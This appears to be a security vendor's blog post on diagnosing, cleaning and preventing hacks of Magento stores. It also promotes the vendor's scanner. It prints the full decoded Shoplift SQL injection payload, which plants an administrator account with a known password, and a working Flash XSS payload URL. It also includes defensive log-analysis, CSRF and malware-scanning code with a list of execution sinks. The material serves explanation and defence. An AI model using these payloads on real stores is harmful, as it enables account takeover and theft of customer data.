Magento Hacked: Symptoms, Causes & Fixes

Magento is open source e-commerce software designed to make it easier for everyday sellers to run an online store. It has a large presence in countries like Australia, where it powers a sizeable share of the e-commerce market. Several severe vulnerabilities have been reported in it, for which the company had to roll out a bundle of updates titled SUPEE-10266. Many Magento stores that get hacked still fall to the Magento "Shoplift" flaw discovered back in 2015. Official support for Magento 1 ends soon, so stores that have not patched or migrated are inviting attackers. According to Mark Lavelle, the CEO of Magento,

Everyone is digital now. In our digital lives we're relying on the technology and the internet, and even more so, the opportunity for bad guys to take advantage of that has blown up; as the internet has blossomed, the bad stuff has also blossomed.

Magento Hacked: Possible Consequences or Symptoms

  • Sensitive data (customer details, card numbers) is stolen from the store via injected phishing pages or malicious JavaScript.
  • The site redirects visitors to malicious sites.
  • Stolen store data is sold on dark-web (.onion) marketplaces, possibly to competitors.
  • Fake or adult advertisements or pop-ups appear on the site.
  • Google shows spam (Japanese-keyword or pharma) search results for your site.
  • The site owner cannot log in, and a 'Your account has been suspended!' message appears.
  • The Magento store is blacklisted by search engines.
  • The store becomes slow and shows error messages.
  • A sudden spike in traffic.
  • Users stop visiting the store because they no longer trust it.
  • A decline in user traffic and revenue.
  • New, rogue admin accounts appear in the admin_user table.
  • The admin panel is defaced, or shows a blank screen after login.

Magento Hacked: Examples

Often, attackers target many Magento stores in one campaign. Not every site admin is a security expert, so affected store owners frequently turn to community forums for help fixing their hacked stores.

[Images: two forum posts from Magento store owners asking for help after a hack]

Is your Magento site hacked? Drop us a message on the chat widget and we'd be happy to help you fix it.

Magento Hacked: Possible Causes of Magento Hack

Magento Hacked: Magento SQL Injection

SQL injection is common in web applications and targets the database of a Magento store, which holds all the sensitive data: order history, transactions, customer records and admin credentials. Magento Community Edition (CE) 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 were vulnerable to an SQL injection in the getCsvFile function of the Mage_Adminhtml_Block_Widget_Grid class. It let the caller pass raw SQL through the popularity[field_expr] parameter whenever popularity[from] or popularity[to] was also set, because field_expr was concatenated into the query instead of being treated as a column name. On paper the endpoint required an admin session, but the 2015 "Shoplift" chain reached it through an authentication bypass, so in practice it was exploited without credentials. Attacks exploiting this were spotted in the wild against Magento stores.

Magento 1

The target URL to which the malicious data was POSTed was:

http://www.example.com/index.php/admin/Cms_Wysiwyg/directive/index/

The payload travelled in the value of the filter key of the request body (filter=<malicious_value>), base64-encoded to evade naive pattern matching. The final encoded payload is shown in the image below.

[Image: the base64-encoded filter payload]

The SQL statements were hidden inside the value of the filter key. When the filter value is base64-decoded, the output is (split into paragraphs here for readability; the attacker sends it as a single string):

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = 'rp';

SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'asdf') ), CONCAT(':', @SALT ));

SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`,`lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','sadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'sadmin'),'Firstname');

The closing parenthesis and semicolon in field_expr=0); terminate the original query, so the remaining statements run on their own. The two SET statements compute a valid Magento 1 admin password hash, md5(salt . password) followed by ':' and the salt, using the attacker's own salt 'rp' and password 'asdf'. The SELECT copies an existing admin's serialized extra column so the new row looks like any other account. The first INSERT adds an active admin_user named sadmin with that hash, and the second INSERT attaches it to the Administrators role (parent_id 1). The net effect is a new administrator with username "sadmin" and password "asdf". What is more alarming is that the exploit is publicly available, so any unpatched store can be taken over with a single request.
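The following is an added example, not code from the original post or from Magento. It reconstructs the request body a responder would find in a web-server or WAF log for the endpoint above, base64-decodes the filter key, and pulls out what matters for triage: whether popularity[field_expr] carries SQL rather than a column name, which tables the injected statements write to, and the admin account they plant. It also shows the Magento 1 password hash format the payload builds, so the planted credentials can be confirmed against a database dump. SAMPLE_BODY is constructed here from the statements quoted above; the helper names are this example's own.

```python
import base64
import hashlib
import re
from urllib.parse import parse_qs, urlencode

# The decoded payload from the article, joined back into the single string the
# attacker base64-encodes (the article split it into paragraphs for readability).
_INJECTED_SQL = (
    "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"
    "SET @SALT = 'rp';"
    "SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'asdf') ), CONCAT(':', @SALT ));"
    "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
    "INSERT INTO `admin_user` (`firstname`,`lastname`,`email`,`username`,`password`,"
    "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`)"
    " VALUES ('Firstname','Lastname','email@example.com','sadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL,NOW());"
    "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name)"
    " VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'sadmin'),'Firstname');"
)
# Constructed POST body: the attacker wraps the SQL in base64 under the `filter` key.
SAMPLE_BODY = urlencode({"filter": base64.b64encode(_INJECTED_SQL.encode()).decode()})


def decode_filter(body: str) -> str:
    """Return the base64-decoded `filter` value of a form-encoded POST body."""
    raw = parse_qs(body).get("filter", [""])[0]
    return base64.b64decode(raw).decode("utf-8", errors="replace")


def analyze_filter(decoded: str) -> dict:
    """Classify a decoded grid filter. A legitimate filter names a column in
    field_expr; a closing paren followed by further statements is injection."""
    m = re.search(r"popularity\[field_expr\]=(.*)", decoded, re.S)
    field_expr = m.group(1) if m else ""
    statements = [s.strip() for s in field_expr.split(";") if s.strip()]
    injected = bool(len(statements) > 1 or not re.fullmatch(r"[\w.]*", field_expr))
    tables = re.findall(r"INSERT\s+INTO\s+`?(\w+)`?", field_expr, re.I)
    # Recover the planted account: the role INSERT names the user, the SET
    # statements carry the salt and the cleartext password being hashed.
    user = re.search(r"username\s*=\s*'([^']+)'", field_expr)
    salt = re.search(r"@SALT\s*=\s*'([^']+)'", field_expr)
    pwd = re.search(r"CONCAT\(\s*@SALT\s*,\s*'([^']+)'\s*\)", field_expr)
    new_admin = None
    if user and salt and pwd:
        new_admin = {"username": user.group(1), "salt": salt.group(1), "password": pwd.group(1)}
    return {"injected": injected, "statements": len(statements),
            "tables_written": tables, "new_admin": new_admin}


def analyze_request(body: str) -> dict:
    """Decode and classify a captured POST body in one step."""
    return analyze_filter(decode_filter(body))


def magento1_hash(password: str, salt: str) -> str:
    """Magento 1 admin password format: md5(salt . password) ':' salt, which is
    exactly what the payload builds with MD5(CONCAT(@SALT, 'asdf'))."""
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def verify_magento1_password(candidate: str, stored: str) -> bool:
    """Check a cleartext guess against a stored admin_user.password value."""
    _digest, _, salt = stored.partition(":")
    return magento1_hash(candidate, salt) == stored


if __name__ == "__main__":
    report = analyze_request(SAMPLE_BODY)
    print(report)
    planted = report["new_admin"]
    print(magento1_hash(planted["password"], planted["salt"]))
```

In an access log the request shows up as a POST to /index.php/admin/Cms_Wysiwyg/directive/index/; any field_expr that is not a plain column name is a finding on its own, before the statements are even read. Once the planted username and hash are known, the same values can be searched for in the admin_user table of a database dump to confirm the account was created.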

Magento 2

Magento Community and Enterprise editions prior to 2.0.10/2.1.2 were vulnerable to a bug in the bundled Zend Framework that led to SQL injection: insufficient value escaping let an attacker inject SQL through the ordering or grouping parameters. One entry point in the Magento admin panel allowed the execution of complete SQL statements, and other entry points may still exist, which is why the fix belongs in the framework rather than at a single call site.

Magento Hacked: Magento XSS

Magento 1

An XSS vulnerability, CVE-2014-9758, was found in Magento 1.9.0.1. It was a DOM-based XSS triggered from the Flash side, in three Flash files shipped with the admin theme:

  • http://[magento_url]/skin/adminhtml/default/default/media/editor.swf
  • http://[magento_url]/skin/adminhtml/default/default/media/uploader.swf
  • http://[magento_url]/skin/adminhtml/default/default/media/uploaderSingle.swf

The FlashVar parameter bridgeName was passed to ExternalInterface.call without sanitisation, so a value containing quotes and parentheses broke out of the JavaScript the SWF generated and ran as script whenever the file loaded. Because the files sit under skin/, they were reachable without logging in. The complete payload looked like the URL below; decoded, the parameter is 1"]));alert(1)}catch(e){alert(1)}//, which closes the string and the call, appends alert(1), and comments out the remainder:

http://example.com/skin/adminhtml/default/default/media/editor.swf?bridgeName=1%22]%29%29;alert%281%29}catch%28e%29{alert%281%29}//

Magento 2

Multiple XSS flaws, tracked as APPSEC-1503, APPSEC-1488 and APPSEC-1539, were found in Magento 2.0. Both the Community and Enterprise editions before 2.0.10/2.1.2 are affected. APPSEC-1503 and APPSEC-1488 are the more severe of the three because they are stored XSS.

  • APPSEC-1503: an attacker can inject JavaScript into email templates; the script runs in the admin's browser when the template is previewed.
  • APPSEC-1488: Magento Enterprise Edition's invitations feature lets an attacker insert JavaScript that is later executed in the admin context.

Magento Hacked: Magento Cross-Site Request Forgery

Magento 1

A CSRF attack makes a logged-in user's browser perform actions the user did not intend. A severe CSRF bug in Magento 1 allowed remote attackers to inject script code into the application via the 'filename' parameter of the image upload module, using a forged POST request. Exploiting it required a low-privileged web application account and low to medium user interaction (the victim had to load attacker-controlled content while logged in). The code snippet of the vulnerable script is given below.

[Image: the vulnerable script]

Here, the 'to' and parent_message_id parameters could be manipulated by the attacker because the handler neither validated them nor required an anti-CSRF token. With these, an attacker could send a message to any other user without their consent, and gained further ability to manipulate content on the hacked store.

Magento 2

Magento Community and Enterprise editions before 2.0.10/2.1.2 suffered from two CSRF bugs.

  • APPSEC-1212: Magento did not validate the anti-CSRF token when deleting items from the mini cart, and accepted the request over GET. An attacker could therefore remove items from a victim's cart through phishing or a hidden image tag.
  • APPSEC-1433: A more severe CSRF vulnerability. Because neither the anti-CSRF token nor the Referer header was validated, an attacker could delete any address on the store.
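The two defects behind the Magento 2 CSRF bugs above, a state change reachable by GET and no check that the request carries the session's anti-CSRF token or came from the store's own origin, are shown here as a vulnerable handler next to a hardened one. This is an added example, not Magento's controller code: Request, Session and the two handlers are hypothetical stand-ins, STORE_HOST is an assumed hostname, and only the parameter name form_key is the one Magento itself uses.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

STORE_HOST = "store.example.com"  # assumed store hostname for the origin check


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (constructed for this example)."""
    method: str
    params: dict = field(default_factory=dict)   # query or form parameters
    headers: dict = field(default_factory=dict)


@dataclass
class Session:
    """Server-side session: the form_key is minted once per session and is the
    value the store's own forms echo back in a hidden field."""
    customer_id: int
    form_key: str = field(default_factory=lambda: secrets.token_urlsafe(16))
    addresses: dict = field(default_factory=dict)


def delete_address_vulnerable(req, sess):
    """Any method, no token, no origin check: an <img src=...> on another site
    deletes the victim's address as soon as the page renders."""
    aid = req.params.get("id")
    if aid not in sess.addresses:
        return 404, "no such address"
    del sess.addresses[aid]
    return 200, "deleted"


def _same_origin(req):
    """Defence in depth: accept only requests whose Origin (or, failing that,
    Referer) names the store. Browsers send Origin on cross-site POSTs."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    return bool(src) and urlsplit(src).hostname == STORE_HOST


def delete_address_hardened(req, sess):
    """State changes only over POST, only with the session's form_key
    (compared in constant time), and only from the store's own origin."""
    if req.method != "POST":
        return 405, "state changes require POST"
    supplied = req.params.get("form_key", "")
    if not hmac.compare_digest(supplied.encode(), sess.form_key.encode()):
        return 403, "invalid form key"
    if not _same_origin(req):
        return 403, "cross-origin request rejected"
    aid = req.params.get("id")
    if aid not in sess.addresses:
        return 404, "no such address"
    del sess.addresses[aid]
    return 200, "deleted"


if __name__ == "__main__":
    # A forged GET from an attacker's page, replayed against each handler.
    victim = Session(customer_id=7, addresses={"12": "home"})
    forged = Request("GET", {"id": "12"}, {"Referer": "https://evil.example/"})
    print(delete_address_vulnerable(forged, victim))
    victim = Session(customer_id=7, addresses={"12": "home"})
    print(delete_address_hardened(forged, victim))
```

The token is the real control: an attacker's page cannot read the victim's form_key, so it cannot forge a request that passes the compare_digest check. The origin check and the POST-only rule are cheap extra layers that also stop the GET-by-image-tag trick used against the mini cart; marking the session cookie SameSite adds a third.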

Magento Hacked: Magento Remote Code Execution

Magento CE and EE before 2.0.10/2.1.2 were vulnerable to remote code execution, tracked as APPSEC-1484 with a severity rating of 9.8 (critical). Some payment methods allowed a user to execute malicious PHP code during checkout, which makes this exploitable by an ordinary shopper with no admin access. An exploit, as well as a Metasploit module for this vulnerability, has already been released.

Magento Hacked: Other Causes

  • Weak, default or hard-coded credentials.
  • LFI, RFI and other OWASP Top 10 issues.
  • Outdated Magento versions and extensions.
  • Server misconfigurations, such as unnecessary open ports.
  • Poor shared hosting with no network segmentation between sites.


Cleaning A Magento Hacked Store

Magento Security: Damage Control

Begin damage control with your logins. Make sure no credentials are default or hard coded; if they are, replace them with long random passwords. Next, clean the store database: list the admin_user table and remove any account you did not create. To lock out every attacker at once, overwrite all admin password hashes so that none of them verifies, then reset the legitimate admins' passwords through a trusted channel. In Magento the admin table is admin_user and the column is password (not users/pass), so the statement is:

UPDATE admin_user SET password = CONCAT('ZZZ', SHA1(CONCAT(password, MD5(RAND()))));

After this no stored hash has the md5:salt shape Magento expects, so no password, attacker-set or otherwise, will log in until it is reset. Also rotate the database, FTP/SSH and API credentials, since an attacker with SQL or file access may have read the database credentials from app/etc/local.xml.

Now deny direct web access to sensitive folders. On Apache this can be done by creating a .htaccess file inside them containing:

Order Deny,Allow
Deny from all
Allow from 22.33.44.55

These directives block every visitor to that folder except the IP on the last line (replace 22.33.44.55 with your own). They use Apache 2.2 syntax; Apache 2.4 uses the Require directives instead, so check which version your host runs. Also review every existing .htaccess file on the site for modifications, since attackers use them for redirects and to hide files; clean any altered one first.

Magento Security: Hunt for Malware

Attackers routinely obfuscate injected code so that it is unreadable to humans, and base64 is their usual wrapper, as it was in the Magento SQLi payload above. To list every PHP file and line that references base64, run:

find . -name "*.php" -exec grep -Hn "base64" {} \; > hiddencode.txt

This records each matching file, line number and line in hiddencode.txt. The encoded strings can then be decoded locally for analysis. Expect legitimate hits too, as Magento core uses base64 in places; compare any suspicious file against a clean copy of the same release before deleting anything. In spam attacks where gibberish is injected into every page, the content usually lives in the database rather than in files; there phpMyAdmin's search can find the injected code across all pages and blocks in one go.

[Image: searching for injected code across pages with phpMyAdmin]
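The find/grep command above only tells you where the word base64 occurs. The added example below, which is not code from the original post, goes the rest of the way a responder has to go by hand: it flags lines that call the usual decode-and-execute sinks (eval, gzinflate, base64_decode and friends), and for every long quoted base64 literal it peels nested base64 and raw-deflate layers so the hidden PHP can be read. The two sample files are constructed for this example, and the payload inside them is a harmless stand-in, not real malware.

```python
import base64
import binascii
import re
import zlib

# Functions an injected PHP fragment typically chains to hide and run its payload.
SINKS = re.compile(
    r"\b(eval|assert|create_function|base64_decode|gzinflate|gzuncompress|"
    r"str_rot13|system|shell_exec|passthru|exec)\s*\(", re.I)
# Quoted base64 blobs long enough to be a hidden payload rather than a short token.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


def peel_layers(data: bytes, max_depth: int = 6) -> bytes:
    """Undo nested base64 / raw-deflate (what PHP's gzinflate() reads) wrapping
    until the data stops decoding, and return the innermost bytes reached."""
    for _ in range(max_depth):
        blob = data.strip()
        if len(blob) >= 16 and len(blob) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", blob):
            try:
                data = base64.b64decode(blob, validate=True)
                continue
            except (binascii.Error, ValueError):
                pass
        try:
            data = zlib.decompress(data, -15)   # -15: raw deflate stream, no zlib header
            continue
        except zlib.error:
            pass
        break
    return data


def scan_source(path: str, text: str) -> list:
    """Return one finding per suspicious line: the sinks it calls and a preview
    of every long base64 literal after peeling its layers."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        sinks = sorted({m.group(1).lower() for m in SINKS.finditer(line)})
        decoded = [peel_layers(b.encode()).decode("utf-8", "replace")[:80]
                   for b in B64_LITERAL.findall(line)]
        if sinks or decoded:
            findings.append({"path": path, "line": lineno, "sinks": sinks, "decoded": decoded})
    return findings


def scan_tree(files: dict) -> list:
    """files maps path -> contents. A real run would walk the docroot with
    os.walk and read each *.php; the in-memory dict keeps this example offline."""
    return [f for path, text in files.items() for f in scan_source(path, text)]


def build_samples() -> dict:
    """Constructed test files: one clean module helper and one dropper of the
    classic eval(gzinflate(base64_decode('...'))) shape."""
    secret = b"<?php echo 'constructed test payload'; ?>"
    comp = zlib.compressobj(wbits=-15)          # raw deflate, like PHP gzdeflate()
    blob = base64.b64encode(comp.compress(secret) + comp.flush()).decode()
    return {
        "app/code/local/Vendor/Module/Helper/Data.php":
            "<?php\nclass Vendor_Module_Helper_Data {\n    public function ok() { return true; }\n}\n",
        "media/.cache/session.php":
            "<?php\n@eval(gzinflate(base64_decode('" + blob + "')));\n",
    }


if __name__ == "__main__":
    for finding in scan_tree(build_samples()):
        print(finding["path"], finding["line"], finding["sinks"])
        for preview in finding["decoded"]:
            print("   decoded:", preview)
```

Treat the sink list as a triage aid, not a verdict: Magento core and legitimate extensions call base64_decode too, so the decoded preview and a diff against a pristine copy of the same release decide whether a hit is malicious. Files under media/ or var/ that contain PHP at all are a red flag regardless of content, since those directories should only hold uploads and cache.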

Magento Security: Restoring Files

Once the malicious code is identified, remove it from the affected pages. If you are unsure whether a piece of code is malicious, comment it out and consult an expert rather than deleting it. Where possible, restore files from a known-clean backup taken before the compromise. If no backup is available, replace the core files with a fresh copy of the same Magento release and reapply only your own customisations.

Magento Hacked Prevention

Update and Backup

Migrate to Magento 2 if you are still on Magento 1. The Magento team fixes critical flaws with each new release, and the changelog lists which ones. Avoid extensions from unknown vendors, as they are likely to contain buggy code. Keep regular backups of both files and database so the site can be restored after an attack. Updates and backups are the cheapest and most effective ways of securing a Magento store.

Security Audit

A security audit can protect the store before an attacker strikes. Not every Magento user can be a security expert, so consider an online service like Astra. Astra's security audit and pen-testing can uncover severe vulnerabilities on the store so that they can be patched before an attacker exploits them.

Astra: Magento Malware Scanner and Magento Firewall Plugin

New vulnerabilities are uncovered in Magento every month, but you can still keep your store safe from fraud and malware for as little as $9 per month. Astra is an out-of-the-box firewall deployed in the cloud, so it protects the store without running a resource-hungry anti-virus on the server, and average users can manage it through a simple dashboard. Installing the Magento firewall plugin is easy, and if you still cannot figure it out, Astra's engineers have you covered. Astra firewall is robust and scalable.

Cleaning and restoring a hacked Magento store is at times confusing and painstaking. Automated tools like Astra help: the Astra Magento malware scanner can detect and remove multiple malware signatures from hacked sites within minutes, and it patches the affected files for you.


About The Author

A computer nerd who loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests and owns a chatbot on Pandorabots named Mark1. In his free time he can be found saving some goals.
